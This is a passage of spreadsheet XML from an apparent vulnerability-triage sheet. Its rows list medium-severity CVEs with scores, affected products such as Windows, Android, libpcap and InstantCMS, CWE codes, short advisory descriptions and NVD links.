s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1846" s="5" t="inlineStr"><is><t>CVE-2026-69637</t></is></c><c r="D1846" s="5" t="n"><v>5.7</v></c><c r="E1846" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1846" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1846" s="5" t="inlineStr" /><c r="H1846" s="5" t="n"><v>0.006</v></c><c r="I1846" s="5" t="inlineStr" /><c r="J1846" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1846" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1846" s="5" t="inlineStr" /><c r="M1846" s="5" t="inlineStr" /><c r="N1846" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1846" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1846" s="5" t="inlineStr" /><c r="Q1846" s="5" t="inlineStr"><is><t>CWE-125, CWE-843</t></is></c><c r="R1846" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t></is></c><c r="S1846" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69637</t></is></c></row><row r="1847"><c r="A1847" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1847" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1847" s="5" t="inlineStr"><is><t>CVE-2026-69679</t></is></c><c r="D1847" s="5" t="n"><v>5.7</v></c><c r="E1847" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1847" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1847" s="5" t="inlineStr" /><c r="H1847" s="5" t="n"><v>0.006</v></c><c r="I1847" s="5" t="inlineStr" /><c r="J1847" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1847" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1847" s="5" t="inlineStr" /><c r="M1847" s="5" t="inlineStr" /><c r="N1847" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1847" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1847" s="5" t="inlineStr" /><c r="Q1847" s="5" t="inlineStr"><is><t>CWE-125, CWE-843</t></is></c><c r="R1847" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t></is></c><c r="S1847" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69679</t></is></c></row><row r="1848"><c r="A1848" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1848" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1848" s="5" t="inlineStr"><is><t>CVE-2026-69723</t></is></c><c r="D1848" s="5" t="n"><v>5.7</v></c><c r="E1848" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1848" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1848" s="5" t="inlineStr" /><c r="H1848" s="5" t="n"><v>0.01</v></c><c r="I1848" s="5" t="inlineStr" /><c r="J1848" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K184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48" s="5" t="inlineStr" /><c r="M1848" s="5" t="inlineStr" /><c r="N1848" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1848" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1848" s="5" t="inlineStr" /><c r="Q1848" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="R1848" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows Kernel allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1848" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69723</t></is></c></row><row r="1849"><c r="A1849" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1849" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1849" s="5" t="inlineStr"><is><t>CVE-2026-75808</t></is></c><c r="D1849" s="5" t="n"><v>5.7</v></c><c r="E1849" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1849" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1849" s="5" t="inlineStr" /><c r="H1849" s="5" t="n"><v>0.001</v></c><c r="I1849" s="5" t="inlineStr" /><c r="J1849" s="5" t="inlineStr" /><c r="K1849" s="5" t="inlineStr" /><c r="L1849" s="5" t="inlineStr" /><c r="M1849" s="5" t="inlineStr" /><c r="N1849" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1849" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1849" s="5" t="inlineStr" /><c r="Q1849" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="R1849" s="5" t="inlineStr"><is><t>Allocation of Resources Without Limits or Throttling in ASUS Armoury Crate allows a local user to cause a denial-of-service condition through system memory exhaustion by bypassing driver authentication and allocating an unrestricted amount of memory.Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t></is></c><c r="S1849" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75808</t></is></c></row><row r="1850"><c r="A1850" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1850" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1850" s="5" t="inlineStr"><is><t>CVE-2026-75810</t></is></c><c r="D1850" s="5" t="n"><v>5.7</v></c><c r="E1850" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1850" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1850" s="5" t="inlineStr" /><c r="H1850" s="5" t="n"><v>0.001</v></c><c r="I1850" s="5" t="inlineStr" /><c r="J1850" s="5" t="inlineStr" /><c r="K1850" s="5" t="inlineStr" /><c r="L1850" s="5" t="inlineStr" /><c r="M1850" s="5" t="inlineStr" /><c r="N1850" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1850" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1850" s="5" t="inlineStr" /><c r="Q1850" s="5" t="inlineStr"><is><t>CWE-749</t></is></c><c r="R1850" s="5" t="inlineStr"><is><t>Exposed Dangerous Method or Function in ASUS Armoury Crate allow a local user to cause a brief system stall by bypassing driver authentication and sending requests to trigger system management interrupts (SMIs). Repeatedly triggering SMI may lead to a denial-of-service (DoS) condition.Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t></is></c><c r="S1850" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75810</t></is></c></row><row r="1851"><c r="A1851" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1851" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1851" s="5" t="inlineStr"><is><t>CVE-2026-78629</t></is></c><c r="D1851" s="5" t="n"><v>5.6</v></c><c r="E1851" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1851" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1851" s="5" t="inlineStr" /><c r="H1851" s="5" t="n"><v>0.001</v></c><c r="I1851" s="5" t="inlineStr" /><c r="J1851" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1851" s="5" t="inlineStr" /><c r="L1851" s="5" t="inlineStr" /><c r="M1851" s="5" t="inlineStr" /><c r="N1851" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1851" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1851" s="5" t="inlineStr" /><c r="Q1851" s="5" t="inlineStr"><is><t>CWE-303</t></is></c><c r="R1851" s="5" t="inlineStr"><is><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is></c><c r="S1851" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78629</t></is></c></row><row r="1852"><c r="A1852" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1852" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1852" s="5" t="inlineStr"><is><t>CVE-2026-83557</t></is></c><c r="D1852" s="5" t="n"><v>5.6</v></c><c r="E1852" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1852" s="5" t="inlineStr"><is><t>36c7be3b-2937-45df-85ea-ca7133ea542c</t></is></c><c r="G1852" s="5" t="inlineStr" /><c r="H1852" s="5" t="n"><v>0.006</v></c><c r="I1852" s="5" t="inlineStr" /><c r="J1852" s="5" t="inlineStr"><is><t>jackson-databind, fasterxml</t></is></c><c r="K1852" s="5" t="inlineStr" /><c r="L1852" s="5" t="inlineStr" /><c r="M1852" s="5" t="inlineStr" /><c r="N1852" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1852" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P1852" s="5" t="inlineStr" /><c r="Q1852" s="5" t="inlineStr"><is><t>CWE-502, CWE-915</t></is></c><c r="R1852" s="5" t="inlineStr"><is><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is></c><c r="S1852" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83557</t></is></c></row><row r="1853"><c r="A1853" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1853" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C1853" s="5" t="inlineStr"><is><t>CVE-2026-12208</t></is></c><c r="D1853" s="5" t="n"><v>5.5</v></c><c r="E1853" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1853" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G1853" s="5" t="inlineStr" /><c r="H1853" s="5" t="n"><v>0.003</v></c><c r="I1853" s="5" t="inlineStr" /><c r="J1853" s="5" t="inlineStr" /><c r="K1853" s="5" t="inlineStr" /><c r="L1853" s="5" t="inlineStr"><is><t>npm:jsonata</t></is></c><c r="M1853" s="5" t="inlineStr"><is><t>1.8.8, 2.2.1</t></is></c><c r="N1853" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O1853" s="5" t="inlineStr" /><c r="P1853" s="5" t="inlineStr" /><c r="Q1853" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R1853" s="5" t="inlineStr"><is><t>A weakness has been identified in jsonata-js jsonata up to 2.2.0. The affected element is the function createFrame of the file src/jsonata.js of the component Function Binding Frame System. This manipulation causes improperly controlled modification of object prototype attributes. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t></is></c><c r="S1853" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12208</t></is></c></row><row r="1854"><c r="A1854" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1854" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1854" s="5" t="inlineStr"><is><t>CVE-2026-16689</t></is></c><c r="D1854" s="5" t="n"><v>5.5</v></c><c r="E1854" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1854" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1854" s="5" t="inlineStr" /><c r="H1854" s="5" t="n"><v>0.001</v></c><c r="I1854" s="5" t="inlineStr" /><c r="J1854" s="5" t="inlineStr" /><c r="K1854" s="5" t="inlineStr"><is><t>ibm:app_connect_enterprise, ibm:integration_bus_for_z\/os</t></is></c><c r="L1854" s="5" t="inlineStr" /><c r="M1854" s="5" t="inlineStr" /><c r="N1854" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1854" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1854" s="5" t="inlineStr" /><c r="Q1854" s="5" t="inlineStr"><is><t>CWE-532</t></is></c><c r="R1854" s="5" t="inlineStr"><is><t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.28 and IBM Integration Bus for z/OS 10.1.0.0 through 10.1.0.7 could allow a local attacker to obtain sensitive information due to improper logging of credentials.</t></is></c><c r="S1854" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16689</t></is></c></row><row r="1855"><c r="A1855" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1855" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1855" s="5" t="inlineStr"><is><t>CVE-2026-18858</t></is></c><c r="D1855" s="5" t="n"><v>5.5</v></c><c r="E1855" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1855" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1855" s="5" t="inlineStr" /><c r="H1855" s="5" t="n"><v>0.001</v></c><c r="I1855" s="5" t="inlineStr" /><c r="J1855" s="5" t="inlineStr" /><c r="K1855" s="5" t="inlineStr"><is><t>ibm:i</t></is></c><c r="L1855" s="5" t="inlineStr" /><c r="M1855" s="5" t="inlineStr" /><c r="N1855" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1855" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1855" s="5" t="inlineStr" /><c r="Q1855" s="5" t="inlineStr"><is><t>CWE-267</t></is></c><c r="R1855" s="5" t="inlineStr"><is><t>IBM i 7.6, and 7.5 could allow a local authenticated attacker to obtain information from a privileged file when using SSH.</t></is></c><c r="S1855" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18858</t></is></c></row><row r="1856"><c r="A1856" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1856" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1856" s="5" t="inlineStr"><is><t>CVE-2026-28584</t></is></c><c r="D1856" s="5" t="n"><v>5.5</v></c><c r="E1856" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1856" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1856" s="5" t="inlineStr" /><c r="H1856" s="5" t="n"><v>0.001</v></c><c r="I1856" s="5" t="inlineStr" /><c r="J1856" s="5" t="inlineStr" /><c r="K1856" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1856" s="5" t="inlineStr" /><c r="M1856" s="5" t="inlineStr" /><c r="N1856" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1856" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1856" s="5" t="inlineStr" /><c r="Q1856" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="R1856" s="5" t="inlineStr"><is><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is></c><c r="S1856" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28584</t></is></c></row><row r="1857"><c r="A1857" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1857" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1857" s="5" t="inlineStr"><is><t>CVE-2026-28596</t></is></c><c r="D1857" s="5" t="n"><v>5.5</v></c><c r="E1857" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1857" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1857" s="5" t="inlineStr" /><c r="H1857" s="5" t="n"><v>0.001</v></c><c r="I1857" s="5" t="inlineStr" /><c r="J1857" s="5" t="inlineStr" /><c r="K1857" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1857" s="5" t="inlineStr" /><c r="M1857" s="5" t="inlineStr" /><c r="N1857" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1857" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1857" s="5" t="inlineStr" /><c r="Q1857" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="R1857" s="5" t="inlineStr"><is><t>In parseInterventionFromXml of GameManagerService.java, there is a possible permanent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S1857" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28596</t></is></c></row><row r="1858"><c r="A1858" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1858" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1858" s="5" t="inlineStr"><is><t>CVE-2026-28617</t></is></c><c r="D1858" s="5" t="n"><v>5.5</v></c><c r="E1858" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1858" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1858" s="5" t="inlineStr" /><c r="H1858" s="5" t="n"><v>0.001</v></c><c r="I1858" s="5" t="inlineStr" /><c r="J1858" s="5" t="inlineStr" /><c r="K1858" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1858" s="5" t="inlineStr" /><c r="M1858" s="5" t="inlineStr" /><c r="N1858" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1858" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1858" s="5" t="inlineStr" /><c r="Q1858" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="R1858" s="5" t="inlineStr"><is><t>In add of WifiNetworkSuggestionsManager.java, there is a possible persistent DOS due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S1858" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28617</t></is></c></row><row r="1859"><c r="A1859" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1859" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1859" s="5" t="inlineStr"><is><t>CVE-2026-28633</t></is></c><c r="D1859" s="5" t="n"><v>5.5</v></c><c r="E1859" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1859" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1859" s="5" t="inlineStr" /><c r="H1859" s="5" t="n"><v>0.001</v></c><c r="I1859" s="5" t="inlineStr" /><c r="J1859" s="5" t="inlineStr" /><c r="K1859" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1859" s="5" t="inlineStr" /><c r="M1859" s="5" t="inlineStr" /><c r="N1859" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1859" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1859" s="5" t="inlineStr" /><c r="Q1859" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="R1859" s="5" t="inlineStr"><is><t>In initForUserNoTracing of VoiceInteractionManagerService.java, there is a possible persistent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S1859" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28633</t></is></c></row><row r="1860"><c r="A1860" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1860" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1860" s="5" t="inlineStr"><is><t>CVE-2026-31911</t></is></c><c r="D1860" s="5" t="n"><v>5.5</v></c><c r="E1860" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1860" s="5" t="inlineStr"><is><t>security@tcpdump.org</t></is></c><c r="G1860" s="5" t="inlineStr" /><c r="H1860" s="5" t="n"><v>0.001</v></c><c r="I1860" s="5" t="inlineStr" /><c r="J1860" s="5" t="inlineStr" /><c r="K1860" s="5" t="inlineStr" /><c r="L1860" s="5" t="inlineStr" /><c r="M1860" s="5" t="inlineStr" /><c r="N1860" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1860" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1860" s="5" t="inlineStr" /><c r="Q1860" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="R1860" s="5" t="inlineStr"><is><t>libpcap BPF interpreter calls abort() if it encounters a BPF instruction that has an invalid opcode.  In particular uncommon use cases a crafted filter program can terminate the OS process.</t></is></c><c r="S1860" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-31911</t></is></c></row><row r="1861"><c r="A1861" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1861" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1861" s="5" t="inlineStr"><is><t>CVE-2026-31912</t></is></c><c r="D1861" s="5" t="n"><v>5.5</v></c><c r="E1861" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1861" s="5" t="inlineStr"><is><t>security@tcpdump.org</t></is></c><c r="G1861" s="5" t="inlineStr" /><c r="H1861" s="5" t="n"><v>0.001</v></c><c r="I1861" s="5" t="inlineStr" /><c r="J1861" s="5" t="inlineStr" /><c r="K1861" s="5" t="inlineStr" /><c r="L1861" s="5" t="inlineStr" /><c r="M1861" s="5" t="inlineStr" /><c r="N1861" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1861" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1861" s="5" t="inlineStr" /><c r="Q1861" s="5" t="inlineStr"><is><t>CWE-125, CWE-1285, CWE-823</t></is></c><c r="R1861" s="5" t="inlineStr"><is><t>libpcap BPF interpreter detects neither reaching the end of the filter program buffer due to lack of a return instruction nor executing a jump instruction with an offset that translates to a pointer outside of the buffer.  In particular uncommon use cases a crafted filter program can cause the interpreter to try reading the OS process memory in the 32GiB around the buffer on 64-bit architectures and in the entire address space on 32-bit architectures.</t></is></c><c r="S1861" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-31912</t></is></c></row><row r="1862"><c r="A1862" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1862" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1862" s="5" t="inlineStr"><is><t>CVE-2026-49883</t></is></c><c r="D1862" s="5" t="n"><v>5.5</v></c><c r="E1862" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1862" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1862" s="5" t="inlineStr" /><c r="H1862" s="5" t="n"><v>0.001</v></c><c r="I1862" s="5" t="inlineStr" /><c r="J1862" s="5" t="inlineStr" /><c r="K1862" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1862" s="5" t="inlineStr" /><c r="M1862" s="5" t="inlineStr" /><c r="N1862" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1862" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1862" s="5" t="inlineStr" /><c r="Q1862" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="R1862" s="5" t="inlineStr"><is><t>In checkReadPermission of PermissionsManager.java, there is a possible way to monitor sensitive device state data due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S1862" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49883</t></is></c></row><row r="1863"><c r="A1863" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1863" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1863" s="5" t="inlineStr"><is><t>CVE-2026-54611</t></is></c><c r="D1863" s="5" t="n"><v>5.5</v></c><c r="E1863" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1863" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1863" s="5" t="inlineStr" /><c r="H1863" s="5" t="n"><v>0.005</v></c><c r="I1863" s="5" t="inlineStr" /><c r="J1863" s="5" t="inlineStr" /><c r="K1863" s="5" t="inlineStr" /><c r="L1863" s="5" t="inlineStr" /><c r="M1863" s="5" t="inlineStr" /><c r="N1863" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1863" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1863" s="5" t="inlineStr" /><c r="Q1863" s="5" t="inlineStr"><is><t>CWE-434, CWE-94</t></is></c><c r="R1863" s="5" t="inlineStr"><is><t>InstantCMS is a free and open source content management system. Versions prior to 2.18.2 have a Remote Code Execution (RCE) issue that allows remote authenticated attackers to execute any PHP code via the component installer. It is possible to upload a malicious component into the server, however, it won't be installed, but upload files will be executed. Normally all php files in upload folder are not executed, however, by uploading custom .htaccess it becomes possible. Version 2.18.2 contains a fix.</t></is></c><c r="S1863" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-54611</t></is></c></row><row r="1864"><c r="A1864" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1864" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1864" s="5" t="inlineStr"><is><t>CVE-2026-6244</t></is></c><c r="D1864" s="5" t="n"><v>5.5</v></c><c r="E1864" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1864" s="5" t="inlineStr"><is><t>security@tcpdump.org</t></is></c><c r="G1864" s="5" t="inlineStr" /><c r="H1864" s="5" t="n"><v>0.001</v></c><c r="I1864" s="5" t="inlineStr" /><c r="J1864" s="5" t="inlineStr" /><c r="K1864" s="5" t="inlineStr" /><c r="L1864" s="5" t="inlineStr" /><c r="M1864" s="5" t="inlineStr" /><c r="N1864" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1864" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1864" s="5" t="inlineStr" /><c r="Q1864" s="5" t="inlineStr"><is><t>CWE-369</t></is></c><c r="R1864" s="5" t="inlineStr"><is><t>libpcap BPF interpreter for the 'div #k' and 'mod #k' ALU instructions does not check whether the immediate value is zero.  In particular uncommon use cases a crafted filter program can cause a division by zero.</t></is></c><c r="S1864" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-6244</t></is></c></row><row r="1865"><c r="A1865" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1865" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1865" s="5" t="inlineStr"><is><t>CVE-2026-6554</t></is></c><c r="D1865" s="5" t="n"><v>5.5</v></c><c r="E1865" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1865" s="5" t="inlineStr"><is><t>security@tcpdump.org</t></is></c><c r="G1865" s="5" t="inlineStr" /><c r="H1865" s="5" t="n"><v>0.001</v></c><c r="I1865" s="5" t="inlineStr" /><c r="J1865" s="5" t="inlineStr" /><c r="K1865" s="5" t="inlineStr" /><c r="L1865" s="5" t="inlineStr" /><c r="M1865" s="5" t="inlineStr" /><c r="N1865" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1865" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1865" s="5" t="inlineStr" /><c r="Q1865" s="5" t="inlineStr"><is><t>CWE-835</t></is></c><c r="R1865" s="5" t="inlineStr"><is><t>libpcap BPF interpreter treats the offset in the 'ja L' BPF instruction as a signed integer to implement looping via backward jumps, but it does not limit the number of loop iterations.  In particular uncommon use cases a crafted filter program can cause the interpreter to loop infinitely.</t></is></c><c r="S1865" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-6554</t></is></c></row><row r="1866"><c r="A1866" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1866" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1866" s="5" t="inlineStr"><is><t>CVE-2026-68830</t></is></c><c r="D1866" s="5" t="n"><v>5.5</v></c><c r="E1866" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1866" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1866" s="5" t="inlineStr" /><c r="H1866" s="5" t="n"><v>0.003</v></c><c r="I1866" s="5" t="inlineStr" /><c r="J1866" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K186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6" s="5" t="inlineStr" /><c r="M1866" s="5" t="inlineStr" /><c r="N1866" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1866" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1866" s="5" t="inlineStr" /><c r="Q1866" s="5" t="inlineStr"><is><t>CWE-269, CWE-59</t></is></c><c r="R1866" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to disclose information locally.</t></is></c><c r="S1866" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68830</t></is></c></row><row r="1867"><c r="A1867" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1867" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1867" s="5" t="inlineStr"><is><t>CVE-2026-68831</t></is></c><c r="D1867" s="5" t="n"><v>5.5</v></c><c r="E1867" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1867" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1867" s="5" t="inlineStr" /><c r="H1867" s="5" t="n"><v>0.003</v></c><c r="I1867" s="5" t="inlineStr" /><c r="J1867" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c 